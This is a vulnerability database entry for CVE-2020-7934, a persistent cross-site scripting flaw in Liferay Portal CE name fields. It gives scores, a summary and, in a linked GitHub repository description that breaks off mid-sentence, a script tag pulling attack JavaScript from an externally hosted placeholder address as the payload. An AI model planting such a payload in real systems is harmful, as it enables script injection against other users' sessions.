CVE-2020-7934

Published: 28/01/2020 Updated: 23/11/2020
CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8
CVSS v3 Base Score: 5.4 | Impact Score: 2.7 | Exploitability Score: 2.3
VMScore: 312
Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N

Vulnerability Summary

In Liferay Portal CE 7.1.0 up to and including 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload is then rendered when a user uses the search feature to search for other users (i.e., when a user with modified fields appears in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.

Vulnerable Product

liferay liferay portal

Exploits

Liferay version 7.2.1 GA2 suffers from a persistent cross-site scripting vulnerability ...

Github Repositories

CVE 2020-7934

How to run CVE

Requirements: docker

Remarks: it's possible to put the script attack online (given the js code) yourjavascriptcom/

Our Js script online for the attack (html): <script src="yourjavascriptcom/920172199111/attackjs"></script>

Commands for configuration: go to root folder of this project run "